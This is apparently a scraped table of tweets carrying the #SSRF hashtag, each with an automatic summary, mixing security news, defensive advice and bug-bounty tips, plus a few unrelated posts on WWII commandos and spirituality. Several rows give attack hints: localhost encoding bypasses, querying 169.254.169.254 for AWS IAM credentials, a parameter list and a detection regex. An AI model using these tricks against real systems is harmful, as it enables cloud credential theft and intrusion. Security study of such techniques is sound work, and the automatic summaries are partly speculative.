| 555 | 2025-01-17 14:43:51 UTC | Advanced #SSRF tip: Use Time-Based Blind SSRF to map internal networks. Send requests to sequential IPs/ports and measure response times. Tools like SSRFmap can automate this process. #PenTesting #RedTeam #InfoSec | The content discusses using Time-Based Blind SSRF to map internal networks by sending requests to sequential IPs/ports and measuring response times. Tools like SSRFmap can automate this process, beneficial for penetration testing, red team activities, and information security. This advanced technique helps identify vulnerabilities and potential entry points in network security. |
| 556 | 2025-01-17 02:38:42 UTC | Defending against #SSRF in microservices? Network segmentation is crucial! Use service mesh policies strict egress controls and never trust traffic between services. Monitor inter-service communication patterns. #DevSecOps #Kubernetes #Security | To defend against Server-Side Request Forgery (#SSRF) in microservices, network segmentation is vital. Implement strict egress controls, service mesh policies, and avoid trusting traffic between services. Monitoring inter-service communication patterns is essential. Emphasizing DevSecOps practices, Kubernetes, and security measures can enhance protection against SSRF attacks in microservices architecture. |
| 557 | 2025-01-16 23:43:14 UTC | Discovered an #SSRF but facing restrictions? Try CRLF injection in HTTP headers race conditions in URL validation or DNS rebinding attacks. Sometimes the initial SSRF is just the start! #BugBounty #HackingTips #WebSecurity | The content discusses strategies to overcome restrictions when facing a Server-Side Request Forgery (SSRF) vulnerability. It suggests using techniques like CRLF injection in HTTP headers, exploiting race conditions in URL validation, or conducting DNS rebinding attacks. It emphasizes that an SSRF issue can be just the beginning of a larger security threat. The post also includes hashtags related to bug bounty programs, hacking tips, and web security. |
| 558 | 2025-01-16 17:43:54 UTC | Hunting for #SSRF in modern web apps? Check GraphQL introspection endpoints PDF generators webhook configurations and image proxy functionality. These features often process user-supplied URLs! #BugBountyTips #WebHacking | The content highlights hunting for Server-Side Request Forgery (#SSRF) in modern web apps by checking GraphQL introspection endpoints, PDF generators, webhook configurations, and image proxy functionality. These features frequently handle user-supplied URLs, making them potential targets for SSRF vulnerabilities. The post also includes hashtags like #BugBountyTips and #WebHacking, indicating it is aimed at security researchers or bug bounty hunters. It suggests focusing on these specific areas to identify and potentially exploit SSRF vulnerabilities in web applications. |
| 559 | 2025-01-16 14:38:28 UTC | Critical #SSRF via AWS IMDSv1: If you can hit 169.254.169.254 you might grab IAM creds & own the cloud infrastructure. Always enforce IMDSv2 with required HTTP PUT header token! #CloudSecurity #AWS #AWSecurity | The content warns about a critical Server-Side Request Forgery (SSRF) vulnerability via AWS IMDSv1, allowing attackers to access IAM credentials and compromise cloud infrastructure by targeting 169.254.169.254. To mitigate this risk, it is advised to enforce IMDSv2 with a required HTTP PUT header token. This emphasizes the importance of implementing proper security measures, especially in cloud environments like AWS, to prevent unauthorized access and protect sensitive information. #CloudSecurity #AWS #AWSecurity. |
| 560 | 2025-01-16 12:02:53 UTC | Veeam Azure Backup Vulnerability Allows Attackers to Utilize SSRF & Send Unauthorized Requests | A vulnerability in Veeam Azure Backup enables attackers to exploit Server-Side Request Forgery (SSRF) to send unauthorized requests. This vulnerability poses a security risk as it allows attackers to manipulate requests and potentially access unauthorized data or services. It is crucial for users of Veeam Azure Backup to be aware of this vulnerability and take necessary precautions to mitigate the risk of unauthorized access and data breaches. |
| 561 | 2025-01-16 07:38:34 UTC | Understanding #SSRF defense in depth: Input validation isn't enough! Implement allowlists DNS resolution controls egress filtering and disable unused URL schemas. Remember: 302 redirects can bypass simple hostname checks. #AppSec #SecurityEngineering | The content emphasizes the importance of a comprehensive defense strategy against Server-Side Request Forgery (SSRF). It highlights that relying solely on input validation is insufficient. Suggestions include implementing allowlists, DNS resolution controls, egress filtering, and disabling unused URL schemas to enhance security. Additionally, it warns that 302 redirects can circumvent basic hostname checks. The post underscores the significance of a multi-layered approach to SSRF defense to bolster application security. |
| 562 | 2025-01-16 01:34:03 UTC | Pro tip: When testing for #SSRF don't just try localhost/127.0.0.1. Remember IPv6 (::1) decimal notation (2130706433) octal format (0177.0.0.1) and domain shortcuts (127.1). Cloud metadata endpoints are gold! #HackingTips #CloudSecurity | The content provides a tip for testing Server-Side Request Forgery (SSRF) vulnerabilities by exploring various formats beyond localhost/127.0.0.1, including IPv6 (::1), decimal notation (2130706433), octal format (0177.0.0.1), and domain shortcuts (127.1). It emphasizes the importance of considering cloud metadata endpoints for potential exploitation. The post also includes hashtags related to hacking tips and cloud security. |
| 563 | 2025-01-15 18:38:30 UTC | Blind #SSRF vulnerabilities can be detected by monitoring response times & using out-of-band techniques like DNS/HTTP callbacks. Set up a Burp Collaborator or interactsh server to catch those internal network calls. #InfoSec #BugBounty #WebSecurity | Blind SSRF vulnerabilities can be identified by monitoring response times and utilizing out-of-band techniques like DNS/HTTP callbacks. Setting up a Burp Collaborator or interactsh server can help capture internal network calls. This approach enhances information security, aids in bug bounty programs, and strengthens web security measures. |
| 564 | 2025-01-15 18:38:29 UTC | Our October webinar, "Find & Fix: How Common Code Flaws Let Hackers In, & How You Keep Them Out" is now available on-demand! | The October webinar titled "Find & Fix: How Common Code Flaws Let Hackers In, & How You Keep Them Out" is now available on-demand. The webinar focuses on cybersecurity, web application security, SSRF, AppSec, code flaws, vulnerability management, and security testing. It provides insights on identifying and addressing common code vulnerabilities to enhance security measures. The webinar aims to educate viewers on preventing hackers from exploiting code flaws. Viewers can access the webinar at the provided link. #Cybersecurity #Webinar #SecurityTesting #CodeFlaws #VulnerabilityManagement |
| 565 | 2025-01-15 18:38:28 UTC | Looking for ways to escalate: Potential for internal resource access or DNS exfiltration? Any creative payload ideas or exploitation techniques? DM or reply with insights! #BugBounty #SSRF #Infosec #EthicalHacking 2/N | The content is seeking ways to escalate by exploring potential for internal resource access or DNS exfiltration. It asks for creative payload ideas or exploitation techniques related to Bug Bounty, SSRF, Infosec, and Ethical Hacking. The invitation is to share insights via direct message or reply. The focus is on finding vulnerabilities and enhancing security measures. |
| 566 | 2025-01-14 06:28:14 UTC | On this day Jan 14th 1942 we remember the Special Operations Executive (SOE) who executed Operation Postmaster. A daring mission where the primary targets was the Italian merchant ship Duchessa d'Aosta and the German tug Likomba. #ww2 #soe #ssrf #Postmaster https://t.co/Usp9xsvKCO | On January 14th, 1942, the Special Operations Executive (SOE) conducted Operation Postmaster, targeting the Italian merchant ship Duchessa d'Aosta and the German tug Likomba during World War II. This daring mission is remembered on this day. The SOE's actions are commemorated with hashtags like #ww2, #soe, #ssrf, and #Postmaster. |
| 567 | 2025-01-12 18:28:54 UTC | Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search Regex \?.=(\/\/?\w|\w\/|\w(%3A|:)(\/|%2F)|%2F|[\.\w]\.\w{24}[\w]) And find potentially vulnerable SSRF params - https://t.co/6cfBPVn0FM #SSRF #cybersec https://t.co/ipnHHHaID4 | The content discusses a method using Burp Search Regex to identify parameters vulnerable to LFI, Path Traversal, SSRF, and Open Redirect. The provided regex pattern helps in finding potentially vulnerable SSRF parameters. The focus is on cybersecurity, specifically SSRF vulnerabilities. The content includes a link for further reference. |
| 568 | 2025-01-09 09:18:17 UTC | Automated SSRF Detection! #BugBounty #SSRF #Regex #bugbountytips #burpsuite Prepare for success: 1 Use a DNS log platform (e.g. Burp Collaborator or https://t.co/UiHRbhDCC8). 2 Ready these regex patterns: | The content discusses automated SSRF detection for bug bounty programs, emphasizing the use of a DNS log platform like Burp Collaborator and specific regex patterns. It suggests preparing for success by utilizing these tools and resources to enhance SSRF vulnerability detection. The post also includes relevant hashtags and a link to regex patterns for reference. |
| 569 | 2025-01-08 13:13:34 UTC | 403 Bypass list by @jhaddix Url Manipulation Methods Top 77 ways to bypass access control #bugbountytip #bugbountytips #ethicalhacking #CyberSecurity #Pentesting #sqli #xss #CyberSecurityAwareness #bugbounty #ssrf #AEM https://t.co/WWzARH89rF | The content discusses a list of 77 URL manipulation methods to bypass access control, shared by @jhaddix. It is related to bug bounty tips, ethical hacking, cybersecurity, pentesting, SQL injection (SQLi), cross-site scripting (XSS), cybersecurity awareness, server-side request forgery (SSRF), and Adobe Experience Manager (AEM). The link provided leads to more detailed information on these methods. |
| 570 | 2025-01-08 10:13:12 UTC | 🎯 Find SSRF Bypass, Cloudflare & AWS Metadata! | The content discusses finding Server-Side Request Forgery (SSRF) bypass methods, accessing Cloudflare and AWS metadata. The author, AnonTriager, shares insights on cybersecurity, bug bounty hunting, and provides additional tips. The content includes links for further reading. Key topics covered are SSRF, Cloudflare, AWS, cybersecurity, and bug bounty programs. |
| 571 | 2025-01-07 04:03:48 UTC | — Houssam Miliani (@0day_dz) | The content appears to be a tweet by a user named Houssam Miliani (@0day_dz) mentioning #ssrf and sharing a link. The link provided seems to redirect to another website. The tweet may be related to a topic or discussion about Server-Side Request Forgery (SSRF) based on the hashtag used. |
| 572 | 2025-01-06 17:58:35 UTC | Step 5: Test SSRF Surf: surf -l ssrf.txt -t 10 -c 200 SSRF Finder: cat ssrf.txt | Step 5 involves testing SSRF Surf using the command "surf -l ssrf.txt -t 10 -c 200" and checking the results with "SSRF Finder: cat ssrf.txt". This step is part of a process to identify and address Server-Side Request Forgery (SSRF) vulnerabilities. The provided link may contain additional information related to this process. |
| 573 | 2025-01-06 10:58:46 UTC | Escalating HTML to SSRF Check out how HTML injection leads to SSRF. Fast testing = HOF in 5 minutes! Learn more: https://t.co/1vrLROS3zh Written by cyber_catz. #BugBounty #Infosec #CyberSecurity #SSRF #Hacking | The content discusses escalating HTML injection to Server-Side Request Forgery (SSRF) and how it can be tested quickly for potential vulnerabilities. The article is written by cyber_catz and provides a link for further information. It highlights the connection between HTML injection and SSRF, emphasizing the importance of fast testing. The post is relevant to Bug Bounty, Infosec, Cybersecurity, SSRF, and Hacking. |
| 574 | 2025-01-05 07:58:04 UTC | SSRF | The content is about Server-Side Request Forgery (SSRF) in web hacking and penetration testing. It includes a video link for more information on SSRF and related topics like web fundamentals, cybersecurity, ethical hacking, and bug bounty tips. The content is in Tamil and is part of a tutorial series on TryHackMe, covering web application security, penetration testing, and CTF challenges. The link provided directs to additional resources on SSRF and its implications in information security and web application security testing. |
| 575 | 2025-01-04 09:48:53 UTC | XXE (XML eXternal Entity injection) vulnerabilities and countermeasures | The content discusses XXE (XML eXternal Entity) injection vulnerabilities and countermeasures. It highlights the importance of protecting against XML external entity injections to prevent security breaches. The post likely provides insights into how these vulnerabilities can be exploited and offers strategies or tools to mitigate the risks associated with XXE attacks. It also mentions the relevance of SSRF (Server-Side Request Forgery) in this context. |
5762025-01-03 14:48:16 UTCWhat is an SSRF attack...and why do we care? 🤔The content discusses SSRF attacks, explaining what they are, how to identify them, and the importance of trust relationships in preventing them. It provides a video link for further details on SSRF attacks, vulnerability, secure coding, and application security. The focus is on understanding SSRF attacks and their significance in maintaining secure systems.
5772025-01-02 09:11:40 UTCInvoice Ninja suffers from a Server-Side Request Forgery flawInvoice Ninja has been identified as having a Server-Side Request Forgery vulnerability. This flaw could potentially allow attackers to manipulate server requests, leading to unauthorized access or data leakage. It is crucial for users of Invoice Ninja to be aware of this security issue and take necessary precautions to mitigate the risk of exploitation.
5782025-01-01 10:43:34 UTCServer-Side Request Forgery - Simple IllustrationThe content discusses Server-Side Request Forgery (SSRF) through a simple illustration. It is shared by @hackhunting and includes hashtags like #ssrf, #bugbountytips, and #webapplicationsecurity. The post likely provides insights or tips related to identifying and addressing SSRF vulnerabilities in web applications.
5792024-12-31 04:01:01 UTCGitHub - hackerassociate/SSRF-Hacks-IP-Decimal: A Burp Suite extension that converts IP addresses to decimal notation, useful for SSRF bypass and WAF evasion testing. Created by Harshad Shah.The content discusses a Burp Suite extension named "SSRF-Hacks-IP-Decimal" created by Harshad Shah. This tool converts IP addresses to decimal notation, aiding in SSRF bypass and WAF evasion testing. It is available on GitHub under the hackerassociate repository. The extension is designed to assist in security testing by converting IP addresses for specific testing scenarios.
5802024-12-30 13:33:28 UTCExploring vulnerabilities? This Cloud Metadata Dictionary by is a must-have!The Cloud Metadata Dictionary by @Jhaddix is recommended for exploring SSRF vulnerabilities and testing metadata services in cloud environments. It is considered a valuable resource for cybersecurity professionals and bug bounty hunters. The dictionary can aid in identifying and addressing security issues related to cloud metadata services. The post emphasizes the importance of this tool in enhancing cybersecurity practices and staying vigilant against potential vulnerabilities.
5812024-12-27 11:28:37 UTCNo. 62 Commando or the Small Scale Raiding Force was a British Commando unit during WW2 under the command of SOE. #62Commando #SSRF #SOE #WW2 More information: https://t.co/yAueGaZ3yw https://t.co/ITC7O7FlmtNo. 62 Commando, also known as the Small Scale Raiding Force, was a British Commando unit in WW2 under SOE command. It played a significant role during the war. For more information, visit the provided links. #62Commando #SSRF #SOE #WW2 🇬🇧
5822024-12-26 17:18:46 UTC:)The content consists of a link and a hashtag related to SSRF (Server-Side Request Forgery). The link provided may lead to more information about SSRF. The use of the smiley face emoticon in the title and the hashtag suggests a positive or light-hearted tone. The content also includes a shortened link that redirects to an external source, possibly for further reading or resources on SSRF.
5832024-12-16 23:49:17 UTCsocalledhacker: Read SSRF: Blacklist and Whitelist-Based Input Filters by Neetrox on Medium: #bugbountytips #bugbounty #bugbountytip #bughunting #hacking #SSRF #infosec #cybersecurity #securityThe content is a tweet promoting an article on Medium titled "SSRF: Blacklist and Whitelist-Based Input Filters" by Neetrox. The article likely discusses strategies for preventing Server-Side Request Forgery (SSRF) attacks using input filters. The tweet includes hashtags related to bug bounty tips, hacking, cybersecurity, and security. The tweet is shared by the user socalledhacker.
5842024-12-16 12:43:45 UTCsocalledhacker: Don't want to use Burpsuite collaborator for SSRF hunting... Check this out an amazing replacement of collaborator:- #bugbounty #bug #bugbountytip #bugbountytips @cybersecurity #infosec #SSRFThe content shared by socalledhacker discusses an alternative to using Burpsuite collaborator for SSRF hunting. The post highlights a replacement tool and encourages users to explore it. The hashtags used indicate the focus on bug bounty, cybersecurity, infosec, and SSRF. The post is shared on Twitter by socalledhacker.
5852024-12-14 07:28:31 UTCImShaadab: Just wrapped up the SSRF room on @RealTryHackMe! Turns out servers will believe anything you tell them if you phrase it right Always validate your inputs folks! #TryHackMe #SSRF #CyberSecurityImShaadab completed the SSRF room on TryHackMe, highlighting that servers can be tricked if inputs are not validated properly. The importance of validating inputs in cybersecurity is emphasized. #TryHackMe #SSRF #CyberSecurity
5862024-12-13 18:33:31 UTC@st3am3dric31: Wrote a beginners guide to testing a web app for Server Side Request Forgery vulnerabilities #ssrf #webhacking #bugbounty #oswa@st3am3dric31 shared a beginner's guide on testing web apps for Server Side Request Forgery (SSRF) vulnerabilities. The guide focuses on #ssrf, #webhacking, #bugbounty, and #oswa. It can be found on Twitter at the provided link.
5872024-12-11 09:18:44 UTComvapt: #SAP fixed critical #SSRF #Vulnerabilities #flaw in #NetWeavers #Adobe_Document ServicesSAP addressed critical SSRF vulnerabilities in NetWeaver's Adobe Document Services, as reported by omvapt on Twitter. The flaws were fixed to enhance security and prevent potential exploitation.
5882024-12-10 16:02:14 UTCSAP fixed critical SSRF flaw in NetWeaver NetWeaverSAP addressed a critical Server-Side Request Forgery (SSRF) vulnerability in NetWeaver, a popular software platform. The flaw could potentially allow attackers to manipulate server requests and access sensitive information. SAP released a fix to address this security issue, aiming to prevent unauthorized access and protect the integrity of NetWeaver systems. It is crucial for users to promptly apply the patch to safeguard their systems from potential exploitation.
5892024-12-10 15:02:45 UTCSAP NetWeaver Vulnerabilities Let Attackers Upload Malicious PDF FilesThe content discusses vulnerabilities in SAP NetWeaver that allow attackers to upload malicious PDF files. These vulnerabilities pose a security risk as attackers can exploit them to compromise systems. Organizations using SAP NetWeaver should be aware of these vulnerabilities and take necessary precautions to protect their systems from potential attacks involving malicious PDF files. Regular security updates and patches should be applied to mitigate the risk of exploitation.
5902024-12-10 15:02:42 UTCSAP Patches Critical Vulnerability in NetWeaverSAP has addressed a critical vulnerability in its NetWeaver platform through patches. The vulnerability posed a significant security risk, prompting the need for immediate action to protect systems using NetWeaver. By releasing these patches, SAP aims to enhance the security of its software and prevent potential exploitation of the vulnerability by malicious actors. This highlights the importance of timely updates and security measures to safeguard sensitive data and systems from cyber threats.
5912024-12-10 09:18:28 UTCJayateerthaG: [New Blog Alert - ] #bugbounty #bugbountytips #hackers #blog #ssrf #lfi #vulnerability #zoho #jayateerthag #infosec #securityJayateerthaG has a new blog post alert related to bug bounty tips, hackers, SSRF, LFI, Zoho, infosec, and security. The tweet provides a link to the blog post.
5922024-12-08 20:13:27 UTC@evert_eriksson: No tree is complete without a few ribs! #ssrf #cwis @_johnedwards @sawhitbe @CWISociety @dotu3535The tweet by @evert_eriksson emphasizes that no tree is complete without a few ribs, accompanied by hashtags #ssrf and #cwis. The tweet mentions @_johnedwards, @sawhitbe, @CWISociety, and @dotu3535. The content can be found on Twitter at the specified link.
5932024-12-08 20:13:26 UTC@DanaEpp: Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. #apihacking #ssrfThe content shared by @DanaEpp on Twitter highlights an article focusing on identifying and exploiting server-side request forgery (SSRF) vulnerabilities within an API. The post encourages readers to explore the article for insights into API hacking and SSRF. The link provided directs users to the source for further information on this topic.
5942024-12-08 06:13:18 UTC@pentesttesting: I just published Server-Side Request Forgery (SSRF) in Laravel: Understanding and Mitigation #LaravelSecurity #CyberSecurity #WebSecurity #SSRF #LaravelTips #PenetrationTesting #VulnerabilityAssessment #WebsiteSecurity #EthicalHacking #CyberAwarenessThe content shared on Twitter discusses Server-Side Request Forgery (SSRF) in Laravel, focusing on understanding and mitigation strategies. It touches on topics like Laravel security, cybersecurity, web security, SSRF, penetration testing, vulnerability assessment, website security, ethical hacking, and cyber awareness. The link provided likely leads to a detailed article or guide on SSRF in Laravel.
5952024-12-06 17:04:34 UTC@KahuLabs_: Case Study Alert! Our team at Kahu Labs recently uncovered a critical SSRF vulnerability that escalated into XSS in a client's web app. This flaw bypassed WAF protections, allowing malicious SVG files to be loaded and executed. Here's how it happened #CyberSecurity #SSRFKahu Labs discovered a serious SSRF vulnerability that led to XSS in a client's web app, bypassing WAF protections. Malicious SVG files could be loaded and executed. The case study highlights the vulnerability escalation and the impact on cybersecurity. #CyberSecurity #SSRF.
5962024-12-05 13:58:56 UTCReneRobichaud: ChatGPT Next Web Vulnerability Let Attackers Exploit Endpoint to Perform SSRF #Infosec #Security #Cybersecurity #CeptBiro #ChatGPT #NextWeb #Vulnerability #Exploit #Endpoint #SSRFThe content discusses a vulnerability in ChatGPT Next Web discovered by ReneRobichaud, allowing attackers to exploit endpoints for Server-Side Request Forgery (SSRF). The post highlights the importance of cybersecurity and provides hashtags related to information security. The vulnerability could potentially be used by attackers to manipulate the endpoint and perform SSRF attacks. The link provided leads to a tweet by ReneRobichaud discussing this issue.
5972024-12-05 13:58:55 UTCCeptBiro: ChatGPT Next Web Vulnerability Let Attackers Exploit Endpoint to Perform SSRF #Infosec #Security #Cybersecurity #CeptBiro #ChatGPT #NextWeb #Vulnerability #Exploit #Endpoint #SSRFThe content discusses a vulnerability in ChatGPT Next Web, allowing attackers to exploit endpoints for Server-Side Request Forgery (SSRF). CeptBiro shared this information on Twitter, emphasizing the importance of cybersecurity and the need to address this vulnerability to prevent potential attacks. The post includes relevant hashtags such as #Infosec, #Security, and #Cybersecurity to raise awareness about the issue.
5982024-12-05 12:31:58 UTCChatGPT Next Web vulnerability Let Attackers exploit endpoint to Perform SSRFThe ChatGPT Next Web vulnerability allows attackers to exploit an endpoint for Server-Side Request Forgery (SSRF) attacks. This vulnerability could potentially be used by malicious actors to manipulate the server into making unauthorized requests on their behalf. It poses a security risk by enabling attackers to abuse the system through SSRF, a technique that can lead to data breaches or unauthorized access. It is crucial for system administrators and developers to address this vulnerability promptly to prevent exploitation and protect sensitive data.
5992024-12-02 18:48:34 UTCCWISociety: New #CWISmemberresearch by #CWISmember Dr Hon Lok (David) Lo team regarding minimally invasive #SSRF techniques! Read more below:Dr. Hon Lok (David) Lo and his team, members of CWISociety, have conducted new research on minimally invasive SSRF techniques. The details of their research can be found on the CWISociety Twitter page.
6002024-11-29 01:33:48 UTCiototsecnews: Wget vulnerability CVE-2024-10524 fixed: possible SSRF attacks via shortened URLs #GNU #JFrog #OpenSource #SSRF #Vulnerability #wgetThe content discusses a vulnerability (CVE-2024-10524) in Wget that could lead to SSRF attacks via shortened URLs. The post highlights the potential risk and mentions relevant hashtags like #GNU, #JFrog, #OpenSource, #SSRF, #Vulnerability, and #wget. The source of the information is a tweet from iototsecnews.
6012024-11-28 02:28:25 UTCsalecharohit: Enhance AWS security by enforcing IMDSv2 with Open Policy Agent (OPA) in Terraform! Protect your instance metadata and reduce unauthorized access risks through #SSRF Learn more: #AWS #OpenPolicyAgent #CloudSecurity #IMDSv2The content discusses enhancing AWS security by enforcing IMDSv2 with Open Policy Agent (OPA) in Terraform to protect instance metadata and reduce unauthorized access risks, particularly against Server-Side Request Forgery (SSRF) attacks. The post encourages learning more about this security measure through the provided link. The focus is on utilizing IMDSv2, OPA, and Terraform to bolster AWS security and safeguard against potential vulnerabilities. The hashtags used include #AWS, #OpenPolicyAgent, #CloudSecurity, and #IMDSv2.
6022024-11-27 08:28:15 UTCInfoSecComm: New Writeup Alert! "SSRF To Internal Data Access Via PDF Print Feature" by Bishal Shrestha is now live on IW! Check it out here: #ssrf #bugbounty #informationsecurityA new writeup titled "SSRF To Internal Data Access Via PDF Print Feature" by Bishal Shrestha is now available on InfoSecComm. The content discusses a security vulnerability related to SSRF that allows access to internal data through the PDF print feature. The post is live on IW and can be viewed using the provided link. It covers topics related to #ssrf, #bugbounty, and #informationsecurity.
6032024-11-26 01:18:48 UTC@bishal0x01: My first-ever SSRF report to Internal Data Access. Feel free to share any feedback! Thanks to @dhungana_bibek7 @tnirmalz for proofreading! #bugbounty #ssrfThe content is a tweet by user @bishal0x01 sharing their first SSRF report on Internal Data Access. They invite feedback and credit @dhungana_bibek7 and @tnirmalz for proofreading. The tweet includes hashtags #bugbounty and #ssrf. The tweet can be found at https://twitter.com/bishal0x01/status/1861088498033275039.
6042024-11-24 21:18:50 UTC@puntopcap: SSRF (Server Side Request Forgery) vulnerability, OWASP API7:2023 - A growing danger for APIs #SSRF #Ciberseguridad #OWASP #APISecurity #SeguridadEnAPIsThe content discusses the SSRF (Server Side Request Forgery) vulnerability as outlined in OWASP API7:2023, highlighting it as a growing danger for APIs. The tweet emphasizes the importance of addressing this security risk in the context of API security and cybersecurity. The link provided leads to further information on the topic.
6052024-11-20 04:04:27 UTCVulnVanguard: The Wget Gambit: CVE-2024-10524 allows SSRF attacks via shorthand URLs, exposing internal servers & data. Patch Wget to 1.25.0, sanitize inputs & avoid shorthand URLs. Don't let Wget become a backdoor: act now! #Cybersecurity #Wget #SSRF #PatchNowThe content warns about CVE-2024-10524 enabling SSRF attacks through shorthand URLs, risking internal server exposure. It advises patching Wget to version 1.25.0, sanitizing inputs, and avoiding shorthand URLs to prevent exploitation. Urging immediate action to prevent Wget from becoming a backdoor, the message emphasizes cybersecurity awareness and the importance of patching vulnerabilities promptly. #Cybersecurity #Wget #SSRF #PatchNow.
6062024-11-19 18:53:52 UTC@JFrogSecurity: New 0-Day #CVE in GNU Wget Found: Our team uncovered CVE-2024-10524 a vulnerability that enables phishing #SSRF and #MiTM attacks by exploiting Wget's shorthand URL handling. Patch it now with Wget 1.25.0! Learn more:A new 0-Day CVE-2024-10524 in GNU Wget has been discovered by @JFrogSecurity, enabling phishing, SSRF, and MiTM attacks through URL handling. The vulnerability can be patched with Wget 1.25.0. For more information, visit https://twitter.com/JFrogSecurity/status/1858942224647455107.
6072024-11-19 17:58:21 UTCJoyerz5: Just Discovered a Cool SSRF!! Now working to make it Impactful!! Any tips guys? How I Found it? On the Image Upload features there was fetch image from URL guess what? Yes I put burp collaborator Link there and got HTTP DNS response back! It is confirm now! #ssrf #bugbountyThe content describes a cybersecurity enthusiast, Joyerz5, who discovered a Server-Side Request Forgery (SSRF) vulnerability while testing an image upload feature. By inserting a Burp Collaborator link, they received an HTTP DNS response, confirming the SSRF. Joyerz5 is now seeking tips to maximize the impact of this finding, indicating involvement in bug bounty programs. The post highlights the importance of identifying and exploiting vulnerabilities like SSRF for security testing and rewards.
6082024-11-19 15:58:37 UTCCCBalert: Warning: Critical vulnerability in #Wget. #CVE-2024-10524 CVSS: 9.8. This #0-day vulnerability could lead to phishing server-side request forgery (#SSRF) and man-in-the-middle (#MiTM) attacks. #Patch #Patch #PatchA critical vulnerability (#CVE-2024-10524) in #Wget with a CVSS score of 9.8 has been identified, posing risks of phishing, server-side request forgery (#SSRF), and man-in-the-middle (#MiTM) attacks. This #0-day vulnerability requires immediate patching to prevent exploitation. The alert emphasizes the urgency of applying patches to mitigate potential security threats.
6092024-11-19 11:53:38 UTC@docbagaria: Broken bones fixed with some metal. #SSRF @drbhavpatelThe tweet by @docbagaria mentions fixing broken bones with metal, possibly referring to orthopedic surgery involving metal implants. The hashtag #SSRF and mention of @drbhavpatel suggest a discussion related to orthopedic procedures or medical advancements. The tweet does not provide detailed information but hints at the use of metal in bone repair, possibly highlighting the use of surgical techniques for treating fractures.
6102024-11-18 18:58:50 UTCJFrogSecurity: Critical 0-Day in GNU Wget Found: Our team uncovered #CVE-2024-10524 a vulnerability that enables phishing #SSRF and #MiTM attacks by exploiting Wget's shorthand URL handling. Patch it now with Wget 1.25.0! Learn more:A critical 0-Day vulnerability, CVE-2024-10524, was discovered in GNU Wget by JFrogSecurity. This flaw allows for phishing, SSRF, and MiTM attacks through exploiting Wget's URL handling. The recommended action is to patch it immediately with Wget 1.25.0. Further details can be found on JFrogSecurity's Twitter page.
6112024-11-18 07:48:25 UTCInfoSecComm: New Writeup Alert! "SSRF to Internal Port Scanning on Self-Hosted Platform " by JEETPAL is now live on IW! Check it out here: #ssrf #bugbountytips #bugbounty #bugbountywriteup #cybersecurityA new writeup titled "SSRF to Internal Port Scanning on Self-Hosted Platform" by JEETPAL has been published on InfoSecComm. The writeup focuses on SSRF vulnerability and internal port scanning. It is available on IW and covers bug bounty tips and cybersecurity. The content can be found on the provided link. #ssrf #bugbountytips #bugbounty #bugbountywriteup #cybersecurity.
6122024-11-17 13:48:27 UTCProwlSec: SSRF Unleashed How to find and where to find: #BugBounty #bugbountytip #hackers #Pentesting #SSRF #Hacking #HUNTER #Anonymous #Tips #CyberSecurityThe content discusses ProwlSec's release on SSRF exploitation, providing guidance on how and where to find SSRF vulnerabilities. It emphasizes bug bounty tips, hacking, penetration testing, and cybersecurity. The information is shared on Twitter by ProwlSec.
6132024-11-12 06:28:32 UTCChaithr62162203: Connecting with the Divine helps us handle life's ups and downs with more clarity and strength, giving us a sense of calm and helping us understand our true path. Take a moment today to reconnect with the Divine and feel the tranquility it brings. #SSRFConnecting with the Divine provides clarity, strength, calmness, and understanding of our life's path. Reconnecting with the Divine can bring tranquility. #SSRF
6142024-11-11 10:28:09 UTCbugvsecurity: Unveiling the Dangers of SSRF Attacks! Did you know that a single SSRF vulnerability can allow attackers to gain unauthorized access to your internal network and cloud resources? Read now to stay ahead of cyber threats #CyberSecurity #SSRFThe content discusses the dangers of Server-Side Request Forgery (SSRF) attacks, highlighting how a single vulnerability can grant unauthorized access to internal networks and cloud resources. It emphasizes the importance of staying informed about cybersecurity threats. The post encourages readers to read further to enhance their understanding and readiness to combat such cyber threats. #CyberSecurity #SSRF.
6152024-11-09 17:19:07 UTCInfosecMonk: Top 25 #SSRF parameters ?dest={target} ?redirect={target} ?uri={target} ?path={target} ?continue={target} ?url={target} ?window={target} ?next={target} ?data={target} ?reference={target} ?site={target}The content discusses the top 25 Server-Side Request Forgery (SSRF) parameters, including examples like ?dest={target}, ?redirect={target}, and ?url={target}. These parameters can be exploited by attackers for SSRF attacks. The list provides insight into common parameters that may be vulnerable to such attacks. The information is shared by InfosecMonk on Twitter.
6162024-11-07 14:13:18 UTC@inj3ct0r: #0day #SmartAgent 1.1.0 Server-Side Request Forgery #Vulnerability #SSRFThe content highlights a Server-Side Request Forgery vulnerability in SmartAgent 1.1.0, tagged as a zero-day exploit. The vulnerability allows attackers to manipulate server requests, potentially leading to unauthorized access or data leakage. The information was shared on Twitter by the user @inj3ct0r.
6172024-11-05 04:04:41 UTCPeet28385834: Server-Side Request Forgery in Qualitor (SSRF) | Bugbounty PoC #bugbounty #bugbountytips #ssrf #qualitor #tips #hackeroneThe content discusses a Server-Side Request Forgery (SSRF) vulnerability found in Qualitor, shared as a Bug Bounty Proof of Concept (PoC) by Peet28385834. The post includes relevant hashtags such as #bugbounty, #ssrf, #qualitor, and #hackerone, indicating it is related to bug bounty programs and security testing. The link provided leads to a tweet by Peet28385834 discussing the SSRF vulnerability in Qualitor.
6182024-11-04 15:58:41 UTC@raahul06: Server-Side Request Forgery (SSRF): SSRF vulnerabilities let attackers trick the server into making unauthorized requests to internal resources potentially exposing sensitive data. Implement input validation and strict access controls to prevent this! #SSRF #OWASP #WebSecThe content warns about Server-Side Request Forgery (SSRF) vulnerabilities that allow attackers to manipulate servers into making unauthorized requests to internal resources, risking sensitive data exposure. It advises implementing input validation and strict access controls to mitigate this risk. The message emphasizes the importance of security measures to prevent SSRF attacks in web applications.
6192024-11-03 09:58:13 UTCs41r4j: Server-Side Request Forgery (#SSRF): - #Enumerate internal #networks including IP addresses and ports - Abuse trust relationships between #servers and gain access to otherwise restricted services - Interact with some non-HTTP services to get remote code execution (#RCE)The content discusses Server-Side Request Forgery (#SSRF), highlighting its capabilities: - Enumerating internal networks, IP addresses, and ports - Abusing trust relationships between servers to access restricted services - Interacting with non-HTTP services for remote code execution (#RCE). The information is shared via a tweet by s41r4j.
